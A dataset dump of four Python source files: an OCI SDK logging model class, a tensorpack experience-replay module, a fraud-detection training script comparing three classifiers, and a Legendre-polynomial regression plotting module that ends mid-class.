Dataset schema (29 columns):
hexsha: string (length 40) | size: int64 (4 to 1.02M) | ext: string (8 classes) | lang: string (1 value)
max_stars_repo_path: string (length 4 to 209) | max_stars_repo_name: string (length 5 to 121) | max_stars_repo_head_hexsha: string (length 40) | max_stars_repo_licenses: list (length 1 to 10) | max_stars_count: int64 (1 to 191k, nullable) | max_stars_repo_stars_event_min_datetime: string (length 24, nullable) | max_stars_repo_stars_event_max_datetime: string (length 24, nullable)
max_issues_repo_path: string (length 4 to 209) | max_issues_repo_name: string (length 5 to 121) | max_issues_repo_head_hexsha: string (length 40) | max_issues_repo_licenses: list (length 1 to 10) | max_issues_count: int64 (1 to 67k, nullable) | max_issues_repo_issues_event_min_datetime: string (length 24, nullable) | max_issues_repo_issues_event_max_datetime: string (length 24, nullable)
max_forks_repo_path: string (length 4 to 209) | max_forks_repo_name: string (length 5 to 121) | max_forks_repo_head_hexsha: string (length 40) | max_forks_repo_licenses: list (length 1 to 10) | max_forks_count: int64 (1 to 105k, nullable) | max_forks_repo_forks_event_min_datetime: string (length 24, nullable) | max_forks_repo_forks_event_max_datetime: string (length 24, nullable)
content: string (length 4 to 1.02M) | avg_line_length: float64 (1.07 to 66.1k) | max_line_length: int64 (4 to 266k) | alphanum_fraction: float64 (0.01 to 1)
hexsha: f740e7537bf56cb8d2a2220e6613977f052c84d4 | size: 2,187 | ext: py | lang: Python
max_stars: path src/oci/logging/models/group_association_details.py | repo Manny27nyc/oci-python-sdk | head de60b04e07a99826254f7255e992f41772902df7 | licenses ["Apache-2.0", "BSD-3-Clause"] | count 249 | events 2017-09-11T22:06:05.000Z to 2022-03-04T17:09:29.000Z
max_issues: path src/oci/logging/models/group_association_details.py | repo Manny27nyc/oci-python-sdk | head de60b04e07a99826254f7255e992f41772902df7 | licenses ["Apache-2.0", "BSD-3-Clause"] | count 228 | events 2017-09-11T23:07:26.000Z to 2022-03-23T10:58:50.000Z
max_forks: path src/oci/logging/models/group_association_details.py | repo Manny27nyc/oci-python-sdk | head de60b04e07a99826254f7255e992f41772902df7 | licenses ["Apache-2.0", "BSD-3-Clause"] | count 224 | events 2017-09-27T07:32:43.000Z to 2022-03-25T16:55:42.000Z
content:
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class GroupAssociationDetails(object):
"""
Groups using the configuration.
"""
def __init__(self, **kwargs):
"""
Initializes a new GroupAssociationDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param group_list:
The value to assign to the group_list property of this GroupAssociationDetails.
:type group_list: list[str]
"""
self.swagger_types = {
'group_list': 'list[str]'
}
self.attribute_map = {
'group_list': 'groupList'
}
self._group_list = None
@property
def group_list(self):
"""
Gets the group_list of this GroupAssociationDetails.
list of group/dynamic group ids associated with this configuration.
:return: The group_list of this GroupAssociationDetails.
:rtype: list[str]
"""
return self._group_list
@group_list.setter
def group_list(self, group_list):
"""
Sets the group_list of this GroupAssociationDetails.
list of group/dynamic group ids associated with this configuration.
:param group_list: The group_list of this GroupAssociationDetails.
:type: list[str]
"""
self._group_list = group_list
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
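# --- Illustrative usage (editor's sketch, not part of the SDK source) ---
# The model is a plain kwargs-initialized data holder; field names follow the
# swagger_types/attribute_map declared in __init__ above (the OCID below is a
# made-up example value):
#   details = GroupAssociationDetails(group_list=["ocid1.group.oc1..example"])
#   details.group_list   # -> ['ocid1.group.oc1..example']
#   repr(details)        # formatted_flat_dict rendering of the fields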
avg_line_length: 30.802817 | max_line_length: 245 | alphanum_fraction: 0.66941
hexsha: ab87a580af5bf2efc666c85d0f768dd0ece197f4 | size: 11,179 | ext: py | lang: Python
max_stars: path examples/DeepQNetwork/expreplay.py | repo yogurfrul/tensorpack | head af5864439e22bb63a55eb2349164087e89a2ae6e | licenses ["Apache-2.0"] | count null | events null
max_issues: path examples/DeepQNetwork/expreplay.py | repo yogurfrul/tensorpack | head af5864439e22bb63a55eb2349164087e89a2ae6e | licenses ["Apache-2.0"] | count null | events null
max_forks: path examples/DeepQNetwork/expreplay.py | repo yogurfrul/tensorpack | head af5864439e22bb63a55eb2349164087e89a2ae6e | licenses ["Apache-2.0"] | count null | events null
content:
# -*- coding: utf-8 -*-
# File: expreplay.py
# Author: Yuxin Wu
import numpy as np
import copy
from collections import deque, namedtuple
import threading
from six.moves import queue, range
from tensorpack.dataflow import DataFlow
from tensorpack.utils import logger
from tensorpack.utils.utils import get_tqdm, get_rng
from tensorpack.utils.stats import StatCounter
from tensorpack.utils.concurrency import LoopThread, ShareSessionThread
from tensorpack.callbacks.base import Callback
__all__ = ['ExpReplay']
Experience = namedtuple('Experience',
['state', 'action', 'reward', 'isOver'])
class ReplayMemory(object):
def __init__(self, max_size, state_shape, history_len):
self.max_size = int(max_size)
self.state_shape = state_shape
assert len(state_shape) == 3, state_shape
# self._state_transpose = list(range(1, len(state_shape) + 1)) + [0]
self._channel = state_shape[2] if len(state_shape) == 3 else 1
self._shape3d = (state_shape[0], state_shape[1], self._channel * (history_len + 1))
self.history_len = int(history_len)
self.state = np.zeros((self.max_size,) + state_shape, dtype='uint8')
self.action = np.zeros((self.max_size,), dtype='int32')
self.reward = np.zeros((self.max_size,), dtype='float32')
self.isOver = np.zeros((self.max_size,), dtype='bool')
self._curr_size = 0
self._curr_pos = 0
self._hist = deque(maxlen=history_len - 1)
def append(self, exp):
"""
Args:
exp (Experience):
"""
if self._curr_size < self.max_size:
self._assign(self._curr_pos, exp)
self._curr_pos = (self._curr_pos + 1) % self.max_size
self._curr_size += 1
else:
self._assign(self._curr_pos, exp)
self._curr_pos = (self._curr_pos + 1) % self.max_size
if exp.isOver:
self._hist.clear()
else:
self._hist.append(exp)
def recent_state(self):
""" return a list of ``hist_len-1`` elements, each of shape ``self.state_shape`` """
lst = list(self._hist)
states = [np.zeros(self.state_shape, dtype='uint8')] * (self._hist.maxlen - len(lst))
states.extend([k.state for k in lst])
return states
def sample(self, idx):
""" return a tuple of (s,r,a,o),
where s is of shape [H, W, (hist_len+1) * channel]"""
idx = (self._curr_pos + idx) % self._curr_size
k = self.history_len + 1
if idx + k <= self._curr_size:
state = self.state[idx: idx + k]
reward = self.reward[idx: idx + k]
action = self.action[idx: idx + k]
isOver = self.isOver[idx: idx + k]
else:
end = idx + k - self._curr_size
state = self._slice(self.state, idx, end)
reward = self._slice(self.reward, idx, end)
action = self._slice(self.action, idx, end)
isOver = self._slice(self.isOver, idx, end)
ret = self._pad_sample(state, reward, action, isOver)
return ret
# the next_state is a different episode if current_state.isOver==True
def _pad_sample(self, state, reward, action, isOver):
# state: Hist+1,H,W,C
for k in range(self.history_len - 2, -1, -1):
if isOver[k]:
state = copy.deepcopy(state)
state[:k + 1].fill(0)
break
# move the first dim to the last
state = state.transpose(1, 2, 0, 3).reshape(self._shape3d)
return (state, reward[-2], action[-2], isOver[-2])
def _slice(self, arr, start, end):
s1 = arr[start:]
s2 = arr[:end]
return np.concatenate((s1, s2), axis=0)
def __len__(self):
return self._curr_size
def _assign(self, pos, exp):
self.state[pos] = exp.state
self.reward[pos] = exp.reward
self.action[pos] = exp.action
self.isOver[pos] = exp.isOver
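# --- Editor's sketch (illustrative only, not part of the original file) ---
# ReplayMemory is a fixed-size circular buffer over parallel numpy arrays;
# the toy shapes below are assumptions for the example:
#   mem = ReplayMemory(max_size=1000, state_shape=(84, 84, 1), history_len=4)
#   frame = np.zeros((84, 84, 1), dtype='uint8')
#   mem.append(Experience(state=frame, action=0, reward=1.0, isOver=False))
#   len(mem)            # grows until max_size, then old entries are overwritten
#   mem.recent_state()  # history_len - 1 most recent frames, zero-padded at the start
#   mem.sample(0)       # (state, reward, action, isOver), state of shape
#                       # [H, W, (history_len + 1) * channel]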
class ExpReplay(DataFlow, Callback):
"""
Implement experience replay in the paper
`Human-level control through deep reinforcement learning
<http://www.nature.com/nature/journal/v518/n7540/full/nature14236.html>`_.
This implementation provides the interface as a :class:`DataFlow`.
This DataFlow is __not__ fork-safe (thus doesn't support multiprocess prefetching).
This implementation assumes that state is
batch-able, and the network takes batched inputs.
"""
def __init__(self,
predictor_io_names,
player,
state_shape,
batch_size,
memory_size, init_memory_size,
init_exploration,
update_frequency, history_len):
"""
Args:
predictor_io_names (tuple of list of str): input/output names to
predict Q value from state.
player (RLEnvironment): the player.
state_shape (tuple): h, w, c
history_len (int): length of history frames to concat. Zero-filled
initial frames.
update_frequency (int): number of new transitions to add to memory
after sampling a batch of transitions for training.
"""
assert len(state_shape) == 3, state_shape
init_memory_size = int(init_memory_size)
for k, v in locals().items():
if k != 'self':
setattr(self, k, v)
self.exploration = init_exploration
self.num_actions = player.action_space.n
logger.info("Number of Legal actions: {}".format(self.num_actions))
self.rng = get_rng(self)
self._init_memory_flag = threading.Event() # tell if memory has been initialized
# a queue to receive notifications to populate memory
self._populate_job_queue = queue.Queue(maxsize=5)
self.mem = ReplayMemory(memory_size, state_shape, history_len)
self._current_ob = self.player.reset()
self._player_scores = StatCounter()
self._current_game_score = StatCounter()
def get_simulator_thread(self):
# spawn a separate thread to run policy
def populate_job_func():
self._populate_job_queue.get()
for _ in range(self.update_frequency):
self._populate_exp()
th = ShareSessionThread(LoopThread(populate_job_func, pausable=False))
th.name = "SimulatorThread"
return th
def _init_memory(self):
logger.info("Populating replay memory with epsilon={} ...".format(self.exploration))
with get_tqdm(total=self.init_memory_size) as pbar:
while len(self.mem) < self.init_memory_size:
self._populate_exp()
pbar.update()
self._init_memory_flag.set()
# quickly fill the memory for debug
def _fake_init_memory(self):
from copy import deepcopy
with get_tqdm(total=self.init_memory_size) as pbar:
while len(self.mem) < 5:
self._populate_exp()
pbar.update()
while len(self.mem) < self.init_memory_size:
self.mem.append(deepcopy(self.mem._hist[0]))
pbar.update()
self._init_memory_flag.set()
def _populate_exp(self):
""" populate a transition by epsilon-greedy"""
old_s = self._current_ob
if self.rng.rand() <= self.exploration or (len(self.mem) <= self.history_len):
act = self.rng.choice(range(self.num_actions))
else:
# build a history state
history = self.mem.recent_state()
history.append(old_s)
history = np.concatenate(history, axis=-1) # H,W,HistxC
history = np.expand_dims(history, axis=0)
# assume batched network
q_values = self.predictor(history)[0][0] # this is the bottleneck
act = np.argmax(q_values)
self._current_ob, reward, isOver, info = self.player.step(act)
self._current_game_score.feed(reward)
if isOver:
if info['ale.lives'] == 0: # only record score when a whole game is over (not when an episode is over)
self._player_scores.feed(self._current_game_score.sum)
self._current_game_score.reset()
self.player.reset()
self.mem.append(Experience(old_s, act, reward, isOver))
def _debug_sample(self, sample):
import cv2
def view_state(comb_state):
state = comb_state[:, :, :-1]
next_state = comb_state[:, :, 1:]
r = np.concatenate([state[:, :, k] for k in range(self.history_len)], axis=1)
r2 = np.concatenate([next_state[:, :, k] for k in range(self.history_len)], axis=1)
r = np.concatenate([r, r2], axis=0)
cv2.imshow("state", r)
cv2.waitKey()
print("Act: ", sample[2], " reward:", sample[1], " isOver: ", sample[3])
if sample[1] or sample[3]:
view_state(sample[0])
def _process_batch(self, batch_exp):
state = np.asarray([e[0] for e in batch_exp], dtype='uint8')
reward = np.asarray([e[1] for e in batch_exp], dtype='float32')
action = np.asarray([e[2] for e in batch_exp], dtype='int8')
isOver = np.asarray([e[3] for e in batch_exp], dtype='bool')
return [state, action, reward, isOver]
# DataFlow method:
def get_data(self):
# wait for memory to be initialized
self._init_memory_flag.wait()
while True:
idx = self.rng.randint(
self._populate_job_queue.maxsize * self.update_frequency,
len(self.mem) - self.history_len - 1,
size=self.batch_size)
batch_exp = [self.mem.sample(i) for i in idx]
yield self._process_batch(batch_exp)
self._populate_job_queue.put(1)
# Callback methods:
def _setup_graph(self):
self.predictor = self.trainer.get_predictor(*self.predictor_io_names)
def _before_train(self):
self._init_memory()
self._simulator_th = self.get_simulator_thread()
self._simulator_th.start()
def _trigger(self):
v = self._player_scores
try:
mean, max = v.average, v.max
self.trainer.monitors.put_scalar('expreplay/mean_score', mean)
self.trainer.monitors.put_scalar('expreplay/max_score', max)
except Exception:
logger.exception("Cannot log training scores.")
v.reset()
if __name__ == '__main__':
from .atari import AtariPlayer
import sys
def predictor(x):
return np.array([1, 1, 1, 1])  # stub Q-values for the standalone demo
player = AtariPlayer(sys.argv[1], viz=0, frame_skip=10, height_range=(36, 204))
E = ExpReplay(predictor,
player=player,
num_actions=player.get_action_space().num_actions(),
populate_size=1001,
history_len=4)
E._init_memory()
for k in E.get_data():
import IPython as IP
IP.embed(config=IP.terminal.ipapp.load_default_config())
pass
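# Editor's note: this __main__ demo predates the constructor defined above
# (ExpReplay.__init__ no longer accepts num_actions or populate_size), so it
# serves only as a template for manual experimentation.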
avg_line_length: 37.766892 | max_line_length: 115 | alphanum_fraction: 0.600501
hexsha: cc1d95b06d3d67a5a337323a08a79e4f85cda60d | size: 4,030 | ext: py | lang: Python
max_stars: path trainer.py | repo marcostx/fraud_detection | head c83da57f9b406844152b8a4fce43c68bcbda247a | licenses ["MIT"] | count null | events null
max_issues: path trainer.py | repo marcostx/fraud_detection | head c83da57f9b406844152b8a4fce43c68bcbda247a | licenses ["MIT"] | count null | events null
max_forks: path trainer.py | repo marcostx/fraud_detection | head c83da57f9b406844152b8a4fce43c68bcbda247a | licenses ["MIT"] | count null | events null
content:
#
# Author : Marcos Teixeira
# SkyNet is watching you
#
# common imports
import numpy as np
import pandas as pd
import os
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score
import matplotlib.pyplot as plt
import lightgbm as lgb
def linear_regression_experiment(xtrain, xtest, ytrain, ytest):
# baseline approach : Logistic Regression using all variables
from sklearn.linear_model import LogisticRegression
# building the model
model = LogisticRegression()
model.fit(xtrain, ytrain)
preds = model.predict(xtest)
# NOTE: sklearn metrics expect (y_true, y_pred); the scores recorded below were
# produced with the original swapped argument order, which interchanges precision and recall.
accuracy = accuracy_score(ytest,preds)
recall = recall_score(ytest,preds)
precision = precision_score(ytest,preds)
f1 = f1_score(ytest,preds)
print("accuracy : {}".format(accuracy))
print("recall : {}".format(recall))
print("precision : {}".format(precision))
print("f1 score : {}".format(f1))
# accuracy : 0.9994666666666666
# recall : 1.0
# precision : 0.68
# f1 score : 0.8095238095238095
def lightGBM_experiment(xtrain, xtest, ytrain, ytest, columns, plot_importance=False):
# parameters for LightGBMClassifier
params = {
'objective' :'multiclass',
'learning_rate' : 0.02,
'num_leaves' : 31,
'is_unbalance': 'true',
"max_depth": -1,
"num_class": 2,
'feature_fraction': 0.5,
'bagging_fraction': 0.5,
'boosting_type' : 'gbdt',
'verbosity': 1
}
lgtrain = lgb.Dataset(xtrain,ytrain)
clf = lgb.train(params, lgtrain, 300,feature_name=list(columns))
preds = clf.predict(xtest)
preds = np.argmax(preds, axis=1)
# (y_true, y_pred) order; see note in linear_regression_experiment
accuracy = accuracy_score(ytest,preds)
recall = recall_score(ytest,preds)
precision = precision_score(ytest,preds)
f1 = f1_score(ytest,preds)
print("accuracy : {}".format(accuracy))
print("recall : {}".format(recall))
print("precision : {}".format(precision))
print("f1 score : {}".format(f1))
# accuracy : 0.9996666666666667
# recall : 0.9545454545454546
# precision : 0.84
# f1 score : 0.8936170212765958
if plot_importance:
ax = lgb.plot_importance(clf)
ax.plot()
plt.show()
def NN_experiment(xtrain, xtest, ytrain, ytest, plot_importance=True):
# neural-network baseline : MLP classifier using all variables
from sklearn.neural_network import MLPClassifier
# building the model
model = MLPClassifier(hidden_layer_sizes=(200, ), activation='relu', solver='adam', alpha=0.0001,
batch_size='auto', learning_rate='constant', learning_rate_init=0.001, power_t=0.5, max_iter=200,
shuffle=True, random_state=None, tol=0.0001, verbose=False, warm_start=False, momentum=0.9,
nesterovs_momentum=True, early_stopping=False, validation_fraction=0.1, beta_1=0.9, beta_2=0.999,
epsilon=1e-08, n_iter_no_change=10)
model.fit(xtrain, ytrain)
preds = model.predict(xtest)
# (y_true, y_pred) order; see note in linear_regression_experiment
accuracy = accuracy_score(ytest,preds)
recall = recall_score(ytest,preds)
precision = precision_score(ytest,preds)
f1 = f1_score(ytest,preds)
print("accuracy : {}".format(accuracy))
print("recall : {}".format(recall))
print("precision : {}".format(precision))
print("f1 score : {}".format(f1))
# accuracy : 0.9996333333333334
# recall : 0.9333333333333333
# precision : 0.84
# f1 score : 0.8842105263157894
# paths
DATASITH_PATH='/Users/marcostexeira/Downloads/DESAFIO_CREDITO/'
DATASITH_FILE='desafio_fraude.csv'
def load_fraud_data(data_path,file):
csv_path = os.path.join(data_path, file)
return pd.read_csv(csv_path)
# loading data
dataset = load_fraud_data(DATASITH_PATH,DATASITH_FILE)
np_dataset = dataset.values
# data split
xtrain, xtest, ytrain, ytest = train_test_split(np_dataset[:, :-1],np_dataset[:, -1],test_size=0.2, random_state=42)
ytrain = ytrain.astype(int)
ytest = ytest.astype(int)
lightGBM_experiment(xtrain, xtest, ytrain, ytest, dataset.columns[:-1].values,True)
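# Editor's note (illustrative, not in the original script): only the LightGBM
# experiment is invoked; the other two baselines defined above could be run
# on the same split, e.g.:
#   linear_regression_experiment(xtrain, xtest, ytrain, ytest)
#   NN_experiment(xtrain, xtest, ytrain, ytest)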
avg_line_length: 29.851852 | max_line_length: 116 | alphanum_fraction: 0.692308
hexsha: 4c1b536c20e38abe2404b0b2e20ef8b399562318 | size: 13,611 | ext: py | lang: Python
max_stars: path fit_plot.py | repo AdamPI314/sensitivity_analysis | head 719ef83643e39580626e69df3bfeb0f60ec882b2 | licenses ["MIT"] | count 1 | events 2018-11-20T09:18:04.000Z to 2018-11-20T09:18:04.000Z
max_issues: path fit_plot.py | repo AdamPI314/sensitivity_analysis | head 719ef83643e39580626e69df3bfeb0f60ec882b2 | licenses ["MIT"] | count null | events null
max_forks: path fit_plot.py | repo AdamPI314/sensitivity_analysis | head 719ef83643e39580626e69df3bfeb0f60ec882b2 | licenses ["MIT"] | count null | events null
content:
"""
fit regression plot
"""
import os
import numpy as np
# from mpl_toolkits.mplot3d import axes3d, Axes3D #<-- Note the capitalization! for plot 3D
import mpl_toolkits.mplot3d.axes3d # register 3d projection
import matplotlib
matplotlib.use('Agg')
from matplotlib import pylab as plt
from matplotlib.ticker import FormatStrFormatter
from color_marker import get_colors_markers_linestyles
import my_utility as mu
import parse_regression_coef as prc
import fit_least_square_regression as flsr
class plot_1D_c:
"""
plot 1D
save to file
"""
xmin = -1
xmax = 1
@staticmethod
def func_leg(x, *coef):
# exclude the 0th order coef, which is a constant
coef_t = np.insert(coef, 0, 0, axis=0)
return np.polynomial.legendre.legval(x, coef_t)
def __init__(self, data_dir, data_sample, target_time, mycoef_1D, zero_order, index, n_2_o_idx=None,
file_name="target_vs_K_1D.jpg"):
label = str(index)
if n_2_o_idx is not None:
label = str(n_2_o_idx[int(label)])
file_name1 = file_name.split(".")[0] + "_" + label + \
"." + file_name.split(".")[-1]
colors, markers, _ = get_colors_markers_linestyles()
fig, ax = plt.subplots(1, 1, sharex=True, sharey=True)
x_1 = data_sample[:, index]
y_1 = target_time
ax.scatter(x_1, y_1, lw=2, color='#FF7F00',
marker=markers[0], label="original")
ax.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
ax.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
x_2 = np.linspace(self.xmin, self.xmax, 50)
y_2 = self.func_leg(x_2, *(mycoef_1D[index, :]))
ax.plot(
x_2, y_2, color='r', marker=markers[1], label="1st order fit w/ zero order")
y_3 = y_2 + zero_order
ax.plot(
x_2, y_3, color='blue', marker=markers[2], label="1st order + zero order")
leg = ax.legend(loc=0, fancybox=True, prop={'size': 10.0})
leg.get_frame().set_alpha(0.7)
ax.grid()
ax.set_xlabel("$k_{" + label + "}$")
ax.set_ylabel("target")
ax.set_xlim([self.xmin, self.xmax])
fig.savefig(os.path.join(data_dir, "output", file_name1), dpi=500)
plt.close('all')
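# --- Editor's sketch (illustrative, not part of the original module) ---
# The plotting classes in this file evaluate Legendre expansions with the
# constant (and, in 2D, first-order) coefficients zeroed out before calling
# numpy's legval/legval2d, e.g. for the 1D case used by plot_1D_c.func_leg:
#   coef = [0.3, -0.1]                          # 1st and 2nd order coefficients only
#   coef_t = np.insert(coef, 0, 0, axis=0)      # prepend a zero 0th-order term
#   np.polynomial.legendre.legval(0.5, coef_t)  # 0.3*P1(0.5) - 0.1*P2(0.5)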
class plot_2D_c:
"""
plot 2D
save to file
"""
# The definition below is only for 2D legendre value evaluation
def my_legendre_polynomial_2D_val(self, data_x_y, *coef2D_in):
# input parameter- pointer got to be pointer to 1D array
# reshape to a 2D array
# coef2D = np.reshape(coef2D_in, (self.Nth_order, self.Nth_order))
coef2D = np.array(coef2D_in).reshape(
(self.Nth_order_2nd, self.Nth_order_2nd))
# exclude 0th and 1st order coef
coef2D = np.insert(np.insert(coef2D, 0, 0, axis=0), 0, 0, axis=1)
# value
return np.polynomial.legendre.legval2d(data_x_y[0], data_x_y[1], coef2D)
def __init__(self, data_dir, data_sample, target_time, my_coef2D, idx_pair_idx, index, n_2_o_idx=None,
file_name="target_vs_K_2D.jpg"):
"""
idx_pair_idx maps index pair (1, 3) to a flatten 1d index
"""
idx_2d = idx_pair_idx[tuple([index[0], index[1]])]
self.Nth_order_2nd = int(np.sqrt(len(my_coef2D[idx_2d, :])))
x_1 = np.linspace(-1, 1)
y_1 = np.linspace(-1, 1)
x_g, y_g = np.meshgrid(x_1, y_1)
fig, a_x = plt.subplots()
plot1 = a_x.imshow(self.my_legendre_polynomial_2D_val([x_g, y_g], *(my_coef2D[idx_2d, :])),
extent=[-1, 1, 1, -1], origin="upper")
c_b = fig.colorbar(plot1, ax=a_x)
c_b.formatter.set_scientific(True)
c_b.formatter.set_powerlimits((-2, 2))
c_b.update_ticks()
label0 = str(index[0])
label1 = str(index[1])
if n_2_o_idx is not None:
label0 = str(n_2_o_idx[int(label0)])
label1 = str(n_2_o_idx[int(label1)])
a_x.set_xlabel("$k_{" + label0 + "}$")
a_x.set_ylabel("$k_{" + label1 + "}$")
a_x.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
a_x.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
file_name1 = file_name.split(".")[0] + \
"_" + label0 + "_" + label1 + \
"_contour." + file_name.split(".")[-1]
fig.savefig(os.path.join(data_dir, "output", file_name1), dpi=500)
fig2 = plt.figure()
a_x_2 = fig2.add_subplot(111, projection='3d')
# plt.hold(True)  # removed: deprecated and deleted in matplotlib >= 3.0 (hold is the default)
data_1_2 = data_sample[:, index]
a_x_2.scatter(data_1_2[:, 0], data_1_2[:, 1], target_time,
c='#d3ffce', marker='o', s=1.0, alpha=0.8)
a_x_2.plot_surface(x_g, y_g, self.my_legendre_polynomial_2D_val([x_g, y_g], *(my_coef2D[idx_2d, :])),
rstride=1, cstride=1,
cmap=plt.cm.get_cmap('jet'), linewidth=0, antialiased=False, alpha=0.8)
a_x_2.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
a_x_2.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
a_x_2.ticklabel_format(axis='z', style='sci', scilimits=(-2, 2))
a_x_2.set_xlabel("$k_{" + label0 + "}$")
a_x_2.set_ylabel("$k_{" + label1 + "}$")
a_x_2.set_zlabel("target")
a_x_2.set_title("$2^{nd}$ order fit function")
a_x_2.view_init(37.5, -30)
# ax2.view_init(20,70)
# ax2.view_init(100,-30)
fig2.subplots_adjust(left=0.01, right=0.90, top=0.95)
file_name2 = file_name.split(".")[0] + "_" + label0 + "_" + label1 + "." + \
file_name.split(".")[-1]
fig2.savefig(os.path.join(data_dir, "output", file_name2), dpi=500)
plt.close('all')
class plot_1D_2D_c:
"""
plot 1D and 2D together
save to file
"""
xmin = -1
xmax = 1
# 1D
def func_leg_1D(self, data_x_y, *zero_first_in):
# exclude the 0th order coef, which is a constant
# zero_t= zero_first_in[0]
coef0 = zero_first_in[1:1 + self.Nth_order_1st]
coef1 = zero_first_in[1 + self.Nth_order_1st:]
coef_t0 = np.insert(coef0, 0, 0, axis=0)
coef_t1 = np.insert(coef1, 0, 0, axis=0)
return np.polynomial.legendre.legval(data_x_y[0], coef_t0) + np.polynomial.legendre.legval(data_x_y[1], coef_t1)
# return np.polynomial.legendre.legval(data_x_y[0], coef_t0)+np.polynomial.legendre.legval(data_x_y[1], coef_t1)+zero_t
# The definition below is only for 2D legendre value evaluation
def my_legendre_polynomial_2D_val(self, data_x_y, *coef2D_in):
# input parameter- pointer got to be pointer to 1D array
# reshape to a 2D array
# coef2D = np.reshape(coef2D_in, (self.Nth_order_2nd, self.Nth_order_2nd))
coef2D = np.array(coef2D_in).reshape(
(self.Nth_order_2nd, self.Nth_order_2nd))
# exclude 0th and 1st order coef
coef2D = np.insert(np.insert(coef2D, 0, 0, axis=0), 0, 0, axis=1)
# value
return np.polynomial.legendre.legval2d(data_x_y[0], data_x_y[1], coef2D)
# The definition below is only for 1D and 2D legendre value evaluation
def my_legendre_polynomial_1D_2D_val(self, data_x_y, *zero_first_second_in):
# input parameter- pointer got to be pointer to 1D array
zero_t = zero_first_second_in[0]
coef0 = zero_first_second_in[1:1 + self.Nth_order_1st]
coef1 = zero_first_second_in[1 +
self.Nth_order_1st:self.Nth_order_1st + 1 + self.Nth_order_1st]
coef_t0 = np.insert(coef0, 0, 0, axis=0)
coef_t1 = np.insert(coef1, 0, 0, axis=0)
coef2D_in = zero_first_second_in[self.Nth_order_1st +
1 + self.Nth_order_1st:]
# reshape to a 2D array
coef2D = np.array(coef2D_in).reshape(
(self.Nth_order_2nd, self.Nth_order_2nd))
# exclude 0th and 1st order coef
coef2D = np.insert(np.insert(coef2D, 0, 0, axis=0), 0, 0, axis=1)
# value
return np.polynomial.legendre.legval(data_x_y[0], coef_t0) + np.polynomial.legendre.legval(data_x_y[1],
coef_t1) + zero_t + \
np.polynomial.legendre.legval2d(data_x_y[0], data_x_y[1], coef2D)
def __init__(self, data_dir, data_sample, target_time, zero_order, my_coef1D, my_coef2D,
idx_pair_idx, index, n_2_o_idx=None,
file_name="target_vs_K_1D_2D.jpg"):
idx_2d = idx_pair_idx[tuple([index[0], index[1]])]
self.Nth_order_2nd = int(np.sqrt(len(my_coef2D[idx_2d, :])))
my_coef1D_1 = my_coef1D[index[0], :]
my_coef1D_2 = my_coef1D[index[1], :]
self.Nth_order_1st = len(my_coef1D_1)
zero_first = [zero_order] + list(my_coef1D_1) + list(my_coef1D_2)
zero_first_second = [zero_order] + \
list(my_coef1D_1) + list(my_coef1D_2) + list(my_coef2D[idx_2d, :])
x_1 = np.linspace(self.xmin, self.xmax)
y_1 = np.linspace(self.xmin, self.xmax)
x_g, y_g = np.meshgrid(x_1, y_1)
fig, a_x = plt.subplots()
# plot1= ax.imshow(self.my_legendre_polynomial_2D_val([xg, yg], *my_coef2D), extent=[-1,1,1,-1], origin="upper")
plot1 = a_x.imshow(self.func_leg_1D(
[x_g, y_g], *zero_first), extent=[-1, 1, 1, -1], origin="upper")
# plot1= ax.imshow(self.my_legendre_polynomial_1D_2D_val([xg, yg], *zero_first_second), extent=[-1,1,1,-1], origin="upper")
cb = fig.colorbar(plot1, ax=a_x)
cb.formatter.set_scientific(True)
cb.formatter.set_powerlimits((-2, 2))
cb.update_ticks()
label0 = str(index[0])
label1 = str(index[1])
if n_2_o_idx is not None:
label0 = str(n_2_o_idx[int(label0)])
label1 = str(n_2_o_idx[int(label1)])
a_x.set_xlabel("$k_{" + label0 + "}$")
a_x.set_ylabel("$k_{" + label1 + "}$")
a_x.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
a_x.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
file_name1 = file_name.split(".")[0] + "_" + label0 + "_" + label1 + "_contour." + \
file_name.split(".")[-1]
fig.savefig(os.path.join(data_dir, "output", file_name1), dpi=600)
fig2 = plt.figure()
a_x_2 = fig2.add_subplot(111, projection='3d')
a_x_2.scatter(data_sample[:, 0], data_sample[:, 1], target_time,
c='#d3ffce', marker='o', s=1.0, alpha=0.8)
a_x_2.plot_surface(x_g, y_g, self.my_legendre_polynomial_2D_val([x_g, y_g], *(my_coef2D[idx_2d, :])),
rstride=1, cstride=1,
cmap=plt.cm.get_cmap('jet'), linewidth=0, antialiased=False, alpha=0.8)
a_x_2.plot_surface(x_g, y_g, self.func_leg_1D([x_g, y_g], *zero_first),
rstride=1, cstride=1,
cmap=plt.cm.get_cmap('jet'), linewidth=0, alpha=0.8)
a_x_2.plot_surface(x_g, y_g, self.my_legendre_polynomial_1D_2D_val([x_g, y_g], *zero_first_second),
rstride=1,
cstride=1,
cmap=plt.cm.get_cmap('jet'), linewidth=0, alpha=0.8)
a_x_2.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
a_x_2.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
a_x_2.ticklabel_format(axis='z', style='sci', scilimits=(-2, 2))
a_x_2.set_xlabel("$k_{" + label0 + "}$")
a_x_2.set_ylabel("$k_{" + label1 + "}$")
a_x_2.set_zlabel("target")
a_x_2.set_title("$0^{th}$ + $1^{st}$ + $2^{nd}$ order fit function")
# ax2.view_init(37.5,-30)
a_x_2.view_init(10.5, -15)
# ax2.view_init(20,70)
# ax2.view_init(100,-30)
fig2.subplots_adjust(left=0.01, right=0.90, top=0.95)
